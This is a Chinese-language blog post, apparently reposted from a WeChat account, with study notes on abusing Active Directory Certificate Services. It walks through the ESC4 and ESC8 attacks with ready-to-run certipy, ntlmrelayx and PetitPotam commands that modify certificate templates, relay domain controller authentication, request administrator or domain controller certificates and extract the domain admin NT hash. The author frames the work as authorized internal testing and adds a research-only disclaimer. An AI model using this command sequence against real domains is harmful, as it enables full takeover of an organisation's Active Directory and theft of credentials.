ADCS学习记录

admin
admin
admin
140800
文章
117
评论
2024年12月11日21:43:27评论69 views字数 1701阅读5分40秒阅读模式
最近负责对公司域环境进行安全测试,故而学习了解到了ADCS( Active Directory Certificate Services)相关知识,特在此做个记录(ESC4、ESC8漏洞)。
相关工具:
1.certipy(用于检测ADCS安全性工具)
https://github.com/ly4k/Certipy
2.mimikatz
https://github.com/gentilkiwi/mimikatz
3.impacket
https://github.com/fortra/impacket/
一、ADCS漏洞检测
如果是陌生的域环境,可以使用命令快速定位域管、域控
net group "Domain Admins" /domainnet group "Domain controllers" /domain
漏洞检测、利用的前置条件是需要有一个域授权账户
使用certipy检测漏洞
certipy find -dc-ip 1.1.1.1 -u xxxxxx -p xxxxxx -vulnerable
二、ESC4、ESC8漏洞利用
关于ADCS的漏洞很多,这里仅记录ESC4、ESC8
1.ESC4
漏洞成因是因为域证书模板-security-赋予了域授权用户可写权限
1)使用certipy将模板修改为esc1利用条件
certipy template -username xxxxxx -password xxxxxx -template xxxx -dc-ip 1.1.1.1 -save-old
2)请求域管证书(证书服务器名称 可在certipy检测漏洞的结果内查看)
certipy req -u xxxxxx@example.com -p xxxxxx -target 1.1.1.1 -ca xxxx-CA -template xxxx -upn administrator@example.com
3)通过域管证书拿到域管理员nt hash
certipy auth -pfx administrator.pfx -dc-ip 1.1.1.1 -debug
4) 拿到域管hash ,即可借助impacket、mimkatz工具执行命令、远程登录做进一步利用
2.ESC8
漏洞成因是在域内,管理员开放了基于HTTP的证书注册服务,这种基于HTTP的证书接口,容易受到NTML中继攻击,通过NTML中继攻击,可以窃取任何进行NTML身份认证的AD用户。
具体表现:
域内有机器web主页为IIS默认页面,存在如下路径:
http://x.x.x.x/certsrv/certfnsh.asp
fscan扫描结果对应如下:
poc-yaml-active-directory-certsrv-detect 
具体流程:

利用PetitPotam对域控进行强制认证漏洞攻击,让域控向本地攻击机进行认证,攻击机监听收到来自域控服务器的NTML认证,使用中继攻击向ADCSweb服务申请DomainController证书,用申请的证书获取Kerberos票据,将自身伪装为高权限账户

1)使用impacket工具包的ntlmrelayx.py监听

python ntlmrelayx.py  -t http://adcs/certsrv/certfnsh.asp -smb2support --adcs --template 'Domain Controller'

2)使用打印机漏洞,触发PetitPotam,使用工具:https://github.com/topotam/PetitPotam

python PetitPotam.py -u '' -d '' -p '' 攻击机ip 辅域_ip

3)对回连返回的base64的证书放入123.txt,解码保存至ad.pfx

cat 123.txt| base64 -d > ad.pfx

4)通过域管证书拿到域管理员nt hash

certipy auth -pfx ad.pfx -dc-ip 1.1.1.1 -debug

5) 拿到域管hash ,即可借助impacket、mimkatz工具执行命令、远程登录做进一步利用

原文始发于微信公众号(舒克的freestyle):ADCS学习记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月11日21:43:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ADCS学习记录https://cn-sec.com/archives/3496816.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息